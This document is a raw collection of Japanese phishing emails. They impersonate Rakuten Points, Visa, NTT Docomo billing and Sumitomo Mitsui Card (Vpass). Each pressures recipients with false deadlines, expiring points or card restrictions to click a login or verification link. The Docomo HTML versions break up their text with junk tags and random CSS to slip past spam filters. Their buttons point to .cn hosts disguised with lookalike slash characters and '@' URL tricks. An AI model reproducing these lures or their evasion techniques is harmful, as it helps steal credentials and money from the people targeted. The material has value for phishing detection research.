【重要情報】楽天ポイント付与遅延の緊急通知QF=0076673619
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,677ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
【重要】楽天ポイント未付与の緊急確認のお知らせLY=621298393565
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,767ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
ご案内:visacardのご利用確認を必ずお願いいたします。umenai-rika-life92597291
【緊急】Visaカードセキュリティ確認要請緊急のお知らせいつもVisaカードをご利用いただき、ありがとうございます。お客様のカードに登録された携帯電話番号の確認が至急必要です。セキュリティ保護のため、24時間以内に手続きを完了してください。 リスク警告未対応の場合、アカウントの利用が制限される可能性があります。速やかなご対応をお願いいたします。 【今すぐ確認手続きを実施してください】下記のリンクをクリックし、画面の指示に従って手続きを進めてください。 確認手続きを進める サポート連絡先ご不明な点はVisaカスタマーサービスまでご連絡ください。発行者: Visaカード東京都中野区中野4-3-2 Visa CO., LTD. All rights reserved
NTTドコモの利用料金支払いの概要XH=3087722540
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]をノルマズへぐ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
.Gzduszml-Rrhsbftbcg .mnuhsrv-veanzx .Bxpxcczpmghphl .mpzlhupn-ngechwyoe .Klvsglnv-Sidikid-Udz {
column-span:none;
}
</style><style>
.ylqtgv-xceesaib .xatwoulkt-jevbiwnc #Nnkidz-Uuxrxv-Jqbxwhwcx .Ckevz-Phjniok-Bqyvrhafz #Hlpl-Vkuxzpzx #mvhnmbg-ebxq #Yjvgds-Xndqxbayyo-Msdyyrgfjg {
display:inline;
animation-fill-mode:none;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>この<oaqk>た</oaqk>び<epvwv>、</epvwv>【<tpytpnnv>お</tpytpnnv>客様番<ijgjws>号</ijgjws>】様<xmdzvsk>の</xmdzvsk>【20<kwlj>2</kwlj>5<svm>年</svm>0<hyqkxni>6</hyqkxni>月<zhwafykv>】</zhwafykv>分<gimhdyf>の</gimhdyf>料金の<gook>お</gook>支<kyw>払</kyw>いが正<ijj>常</ijj>に完了<cale>し</cale>な<wbruluq>か</wbruluq>っ<sibul>た</sibul>こと<ezvzncsm>を</ezvzncsm>お知<jcayuafo>ら</jcayuafo>せいた<sxppij>し</sxppij>ます。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://azdj.com∕nyujwdfgf∕irweh∕ldzxi∕ioiexmiiv∕trffdoudz∕blqdp∕hrezxhmvq@bcye.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
【緊急】楽天ポイント未反映分の至急確認のご案内QX=3711945469
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天
ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社
の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知
は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,
050ポイント有効期限:本通知受信後72時間原因:登録
情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情
報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施
本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力
をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確
認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ |
個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
重要なお知らせ:visacardの使用確認手続きをお願いします。saito_abiko321699774522
【緊急】Visaカードセキュリティ確認要請緊急のお知らせいつもVisaカードをご利用いただき、ありがとうございます。お客様のカードに登録された携帯電話番号の確認が至急必要です。セキュリティ保護のため、24時間以内に手続きを完了してください。 リスク警告未対応の場合、アカウントの利用が制限される可能性があります。速やかなご対応をお願いいたします。 【今すぐ確認手続きを実施してください】下記のリンクをクリックし、画面の指示に従って手続きを進めてください。 確認手続きを進める サポート連絡先ご不明な点はVisaカスタマーサービスまでご連絡ください。発行者: Visaカード東京都中野区中野4-3-2 Visa CO., LTD. All rights reserved
ドコモの利用代金の支払い方法VN=56090517551
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]ぅエホンれヂんさ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
#cDNObaDLV-Yoyb .Cveq-Lxrfverjr-Cqhybt #pcS-QqzGxBkv #Cwcufkboo {
user-select:auto;
}
</style><style>
.jvhbjuphwxiofvmb .Vfr-Isgnhd .Pudkcivkn-Gxwvvsc #Qfmsi-Ichidgkoyl .krriqkplwluesdddkilb #Dflamixj-Alb-Yxvhsnlr #Cglodgavlyod #Dzb-Ehcmemmdi .Hdb-mTqmNaFHMu {
justify-content:flex-start;
border-top-color:transparent;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>この<txuttvh>た</txuttvh>び<sxyer>、</sxyer>【<ufwk>お</ufwk>客<tukfen>様</tukfen>番<irea>号</irea>】様<ltvqwsd>の</ltvqwsd>【<eskx>2</eskx>025<bosogez>年</bosogez>06<qtugkg>月</qtugkg>】分<jgub>の</jgub>料金の<okjb>お</okjb>支払<nuqe>い</nuqe>が正<dmlb>常</dmlb>に完<kizcy>了</kizcy>しなか<zkoa>っ</zkoa>たこと<rridew>を</rridew>お知<bavdq>ら</bavdq>せ<dhs>い</dhs>たしま<iqbfmm>す</iqbfmm>。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://zghal.com∕brdrgx∕xbdmvgrvae∕ltusvfsfc∕ycxymqg∕qijtwmsn∕uduusul∕blivxzbu@bcye.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
お願い:visacardのご使用確認を早急に行ってください。kodama_hiroshima4704353607817
【緊急】Visaカードセキュリティ確認要請緊急のお知らせいつもVisaカードをご利用いただき、ありがとうございます。お客様のカードに登録された携帯電話番号の確認が至急必要です。セキュリティ保護のため、24時間以内に手続きを完了してください。 リスク警告未対応の場合、アカウントの利用が制限される可能性があります。速やかなご対応をお願いいたします。 【今すぐ確認手続きを実施してください】下記のリンクをクリックし、画面の指示に従って手続きを進めてください。 確認手続きを進める サポート連絡先ご不明な点はVisaカスタマーサービスまでご連絡ください。発行者: Visaカード東京都中野区中野4-3-2 Visa CO., LTD. All rights reserved
【重要情報】楽天ポイント未加算エラーの修正通知KM=040133015993
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,538ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
ドコモのサービス料金の支払いについてXN=30311214747484
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]つゎてぃてげえそベま</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
.qIJTY-RzBDNPXZx-uTxGA #Eanv-Zentofdq-Jghu .GNwudLVpkR-SAJ-qZOCvmbvPq .Eisqyfohclqgg #jogAwWpa-wLF #jnk-wdj-idqgneheal .orc-ason-yxljgs .Pvjvjustwugseraa {
border-bottom-right-radius:1em;
outline-style:none;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>この<egrihlun>た</egrihlun>び<gab>、</gab>【お客<eav>様</eav>番号】<pjkvu>様</pjkvu>の【2<awoyyp>0</awoyyp>25<pucv>年</pucv>0<slhh>6</slhh>月】<wdb>分</wdb>の<pphuvvnx>料</pphuvvnx>金<qcehlun>の</qcehlun>お支払<yziew>い</yziew>が正<otj>常</otj>に完了<uozjzaku>し</uozjzaku>なかっ<yonbid>た</yonbid>ことを<fipsby>お</fipsby>知らせ<kwsgu>い</kwsgu>た<wwne>し</wwne>ます<tdtkj>。</tdtkj></div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://tpid.com∕jxtcurti∕ohvthu∕gkilwngxe∕zzebxpzfxv∕ofjbnzi∕pccbkmkv∕svqvyvs@bcye.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
NTTドコモの料金支払いのポイントVK=1282274211320
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]とろカケヮユれ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
#aomj-dee-fmndwjh #Rgizq-Hkqbjvvy-Vwfvgscbf #Alytroy-Xrpvtusocf-Rphbmc #DjgKTan-KpKmTYVhot {
min-width:0;
}
</style><style>
.Wcasjlrlak-Towytn-Wvndupkx #Cobf-Wtzo-Gqggmpe .Hygrdm-Ikimfyhx .kafuzdp-gxha #qSjrseHgwCmhbKWrIn .kAYfeXlPbve #Lsmzltx-Gszpmioqt .diffhdlikdez .Pehflmlhgdnmx #nbzmcnhs-iokco {
text-decoration-line:none;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>このた<eaar>び</eaar>、<krr>【</krr>お客様<kmxlb>番</kmxlb>号】様<edwiam>の</edwiam>【2<phs>0</phs>25年<fimuttol>0</fimuttol>6月<mgcb>】</mgcb>分の料<ukjk>金</ukjk>の<ylvanut>お</ylvanut>支払<zdt>い</zdt>が正<acs>常</acs>に<cgwjcylr>完</cgwjcylr>了<xidjojb>し</xidjojb>なかっ<gusmend>た</gusmend>ことを<dfsrbnml>お</dfsrbnml>知<tbb>ら</tbb>せ<qfqzkptz>い</qfqzkptz>た<adjusvzp>し</adjusvzp>ま<pcfgqx>す</pcfgqx>。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://lhtr.com∕bzcuqncam∕xqqjcxox∕xbfrc∕dbgyedla∕boeyrumjp∕ditlwoxlnb∕whagnlvb@kzet.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
NTTドコモのサービス代金の支払いRZ=3226962337
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]らヱモすヴきヌ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
.qdgrpmiiwsq #bxtzcrhpcopwnd .vfFTLcauEZU #Ghthw-Lmkbabr-Syf .ggksj-tpnrkeefi-tvtryys {
border-bottom-left-radius:1em;
bottom:auto;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>こ<axdh>の</axdh>たび<xhic>、</xhic>【お客<fqpq>様</fqpq>番<qjvf>号</qjvf>】様<fopo>の</fopo>【20<nofldd>2</nofldd>5<szj>年</szj>06月<sdu>】</sdu>分<vczgqf>の</vczgqf>料金<cybgojh>の</cybgojh>お支<mcummx>払</mcummx>いが正<qasdcb>常</qasdcb>に<ytx>完</ytx>了し<yacj>な</yacj>かっ<alkzwkd>た</alkzwkd>こ<seifsqa>と</seifsqa>をお<rawrep>知</rawrep>ら<ciocs>せ</ciocs>いた<bgdfa>し</bgdfa>ま<yksjuks>す</yksjuks>。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://exsl.com∕zwbxa∕vzsrwxlsc∕jzzlho∕xsmvxwxfkp∕jssxs∕cyzwztxfpl∕fudvlae@kzet.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
ドコモの料金お支払いの詳細YV=7512831235108
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]ワりきまデャひぱ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
#yhn-rru-ntyxngitd #eht-waxcsdfh .CaHUxy #Imayr-Wgv-Xqnvfqu {
direction:ltr;
backface-visibility:visible;
}
</style><style>
.fusme-odmkijzylp #Zhjael-Ruzl-Rcstxkjcw .Dmvr-Fmbpfkavt-Byguebo .kDkXSDYAl .owonjgl-sxdwheqf-covolpr #Qlnpvvmjkfqrhfpoi {
font-feature-settings:normal;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>この<lvaiql>た</lvaiql>び、【<apms>お</apms>客様番<mnq>号</mnq>】様<qxfmhwfh>の</qxfmhwfh>【20<myizhuo>2</myizhuo>5年<isxvjst>0</isxvjst>6月<cvjyvmh>】</cvjyvmh>分の<islk>料</islk>金のお<ooqds>支</ooqds>払<xdvqg>い</xdvqg>が<wuo>正</wuo>常に完<fsindw>了</fsindw>しな<ofrjyp>か</ofrjyp>ったこ<ubqu>と</ubqu>をお<xfdefpq>知</xfdefpq>らせ<ecwxtf>い</ecwxtf>たし<gbsur>ま</gbsur>す<srgtb>。</srgtb></div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://ojay.net∕gxghn∕gfhhavufz∕kgpywhgylb∕rpmmzlgei∕kukjiac∕vxttxs∕gcgyq@kzet.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
【緊急】楽天ポイント未反映分の至急確認のご案内CN=3427173033
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,727ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
Vpass情報を更新してください.
本いつも弊社カードをご利用いただきありがとうございます。
昨今の第三者不正利用の急増に伴い、弊社では「不正利用監視システム」を導入し、24時間365日体制でカードのご利用に対するモニタリングを行っております。
このたび、ご本人様のご利用かどうかを確認させていただきたいお取引がありましたので、誠に勝手ながら、カードのご利用を一部制限させていただき、ご連絡させていただきました。
つきましては、以下へアクセスの上、カードのご利用確認にご協力をお願い致します。
ご回答をいただけない場合、カードのご利用制限が継続されることもございますので、予めご了承下さい。
ご利用確認はこちら
━━━━━━━
■ 注意事項
━━━━━━━
※カードの個人情報によっては電話で連絡する場合もございます。
※正確な情報は必ず記入してください。
━━━━━━━
■発行者
━━━━━━━
三井住友カード株式会社
〒105-8011 東京都港区海岸1丁目2番20号 汐留ビルディング
Copyright Sumitomo Mitsui Banking Corporation.All Rights Reserved.
みとさゆくヵひヂづり
重要なお願い:visacardのご使用確認をお願いします。hanamura_kazu518_lover07581
【緊急】Visaカードセキュリティ確認要請緊急のお知らせいつもVisaカードをご利用いただき、ありがとうございます。お客様のカードに登録された携帯電話番号の確認が至急必要です。セキュリティ保護のため、24時間以内に手続きを完了してください。 リスク警告未対応の場合、アカウントの利用が制限される可能性があります。速やかなご対応をお願いいたします。 【今すぐ確認手続きを実施してください】下記のリンクをクリックし、画面の指示に従って手続きを進めてください。 確認手続きを進める サポート連絡先ご不明な点はVisaカスタマーサービスまでご連絡ください。発行者: Visaカード東京都中野区中野4-3-2 Visa CO., LTD. All rights reserved
ドコモの請求金額の支払いについてTF=565463208126
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]ニゼまヂる</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } 